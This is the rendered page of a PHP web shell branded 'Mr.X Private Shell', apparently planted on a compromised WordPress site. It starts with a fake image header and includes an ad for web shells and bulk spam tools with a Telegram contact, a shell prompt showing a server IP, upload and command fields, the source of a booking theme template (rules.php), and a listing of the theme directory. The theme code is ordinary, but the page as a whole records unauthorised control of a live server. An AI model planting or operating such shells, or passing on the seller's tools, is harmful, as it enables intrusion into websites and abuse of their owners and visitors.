����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
global $post, $homey_prefix, $homey_local, $hide_labels;

$exp_prefix = 'experience_';

$smoke            = homey_get_experience_data('experience_smoke');
$pets             = homey_get_experience_data('experience_pets');
$party            = homey_get_experience_data('experience_party');
$children         = homey_get_experience_data('experience_children');
$additional_rules = homey_get_experience_data('additional_rules');

$cancellation_policy = homey_get_experience_data('cancellation_policy');
if(!empty($cancellation_policy)){
    $cancellation_policy   = get_the_content( '', '',  $cancellation_policy ); // Where $cancellation_policy is the ID
}else{
    $cancellation_policy = '';
}

if($smoke != 1) {
    $smoke_allow = 'homey-icon homey-icon-arrow-right-1';
    $smoke_text = esc_html__(homey_option('experience_sn_text_no'), 'homey');
} else {
    $smoke_allow = 'homey-icon homey-icon-arrow-right-1';
    $smoke_text = esc_html__(homey_option('experience_sn_text_yes'), 'homey');
}

if($pets != 1) {
    $pets_allow = 'homey-icon homey-icon-arrow-right-1';
    $pets_text = esc_html__(homey_option('experience_sn_text_no'), 'homey');
} else {
    $pets_allow = 'homey-icon homey-icon-arrow-right-1';
    $pets_text = esc_html__(homey_option('experience_sn_text_yes'), 'homey');
}

if($party != 1) {
    $party_allow = 'homey-icon homey-icon-arrow-right-1';
    $party_text = esc_html__(homey_option('experience_sn_text_no'), 'homey');
} else {
    $party_allow = 'homey-icon homey-icon-arrow-right-1';
    $party_text = esc_html__(homey_option('experience_sn_text_yes'), 'homey');
}

if($children != 1) {
    $children_allow = 'homey-icon homey-icon-arrow-right-1';
    $children_text = esc_html__(homey_option('experience_sn_text_no'), 'homey');
} else {
    $children_allow = 'homey-icon homey-icon-arrow-right-1';
    $children_text = esc_html__(homey_option('experience_sn_text_yes'), 'homey');
}
?>
<div id="rules-section" class="rules-section">
    <div class="block">
        <div class="block-section">
            <div class="block-body">
                <div class="block-left">
                    <h3 class="title"><?php echo esc_attr(homey_option('experience_sn_terms_rules')); ?></h3>
                </div><!-- block-left -->
                <div class="block-right">
                    <ul class="rules_list detail-list">
                        <?php if(@$hide_labels[$exp_prefix.'sn_smoking_allowed'] != 1) { ?>
                            <li>
                                <i class="<?php echo esc_attr($smoke_allow); ?>" aria-hidden="true"></i>
                                <?php echo esc_attr(homey_option('experience_sn_smoking_allowed')); ?>:
                                <strong><?php echo esc_attr($smoke_text); ?></strong>
                            </li>
                        <?php } ?>

                        <?php if(@$hide_labels[$exp_prefix.'sn_pets_allowed'] != 1) { ?>
                            <li>
                                <i class="<?php echo esc_attr($pets_allow); ?>" aria-hidden="true"></i>
                                <?php echo esc_attr(homey_option('experience_sn_pets_allowed')); ?>:
                                <strong><?php echo esc_attr($pets_text); ?></strong>
                            </li>
                        <?php } ?>

                        <?php if(@$hide_labels[$exp_prefix.'sn_party_allowed'] != 1) { ?>
                            <li>
                                <i class="<?php echo esc_attr($party_allow); ?>" aria-hidden="true"></i>
                                <?php echo esc_attr(homey_option('experience_sn_party_allowed')); ?>:
                                <strong><?php echo esc_attr($party_text); ?></strong>
                            </li>
                        <?php } ?>

                        <?php if(@$hide_labels[$exp_prefix.'sn_children_allowed'] != 1) { ?>
                            <li>
                                <i class="<?php echo esc_attr($children_allow); ?>" aria-hidden="true"></i>
                                <?php echo esc_attr(homey_option('experience_sn_children_allowed')); ?>:
                                <strong><?php echo esc_attr($children_text); ?></strong>
                            </li>
                        <?php } ?>
                    </ul>

                    <?php if( (!empty($additional_rules) && @$hide_labels[$exp_prefix.'sn_add_rules_info'] != 1) || !empty($cancellation_policy)) { ?>
                        <div class="detail-list">

                            <?php if(!empty($cancellation_policy)) { ?>
                                <div><strong><?php echo esc_attr($homey_local['cancel_policy']); ?></strong></div>
                                <div><?php echo $cancellation_policy; ?></div>
                            <?php } ?>

                            <?php if(!empty($additional_rules) && @$hide_labels[$exp_prefix.'sn_add_rules_info'] != 1) { ?>
                                <div><strong><?php echo esc_attr(homey_option('experience_sn_add_rules_info')); ?></strong></div>
                                <div><?php echo ''.($additional_rules); ?></div>
                            <?php } ?>
                        </div>
                    <?php } ?>

                </div><!-- block-right -->
            </div><!-- block-body -->
        </div><!-- block-section -->
    </div><!-- block -->
</div>

Filemanager

Name Type Size Permission Actions
booking Folder 0755
about-commercial.php File 2.84 KB 0644
about-host.php File 840 B 0644
about-v1.php File 7.9 KB 0644
about-v2.php File 6.72 KB 0644
about.php File 277 B 0644
availability.php File 2.37 KB 0644
contact-form.php File 5.05 KB 0644
contact-host.php File 4.08 KB 0644
custom-periods.php File 2.06 KB 0644
details.php File 7.78 KB 0644
experience-nav.php File 3.81 KB 0644
extra-prices.php File 1.76 KB 0644
features.php File 1.87 KB 0644
gallery.php File 3.39 KB 0644
host.php File 4.4 KB 0644
item-address.php File 2.2 KB 0644
map.php File 1.5 KB 0644
prices-hourly.php File 6.45 KB 0644
prices.php File 1.37 KB 0644
providing.php File 3.31 KB 0644
reviews.php File 5.57 KB 0644
rules.php File 5.31 KB 0644
services.php File 1.59 KB 0644
share.php File 1.67 KB 0644
similar-experience.php File 2.29 KB 0644
single-experience-v1.php File 6.19 KB 0644
single-experience-v2.php File 5.75 KB 0644
single-experience-v3.php File 6.21 KB 0644
single-experience-v4.php File 5.86 KB 0644
single-experience-v5.php File 6.6 KB 0644
single-experience-v6.php File 6.58 KB 0644
title.php File 3.41 KB 0644
top-gallery-full-width.php File 1.54 KB 0644
top-gallery-grid-section.php File 1.78 KB 0644
top-gallery-variable-width.php File 1.01 KB 0644
top-gallery.php File 1.44 KB 0644
video.php File 1.54 KB 0644
what-nearby.php File 10.32 KB 0644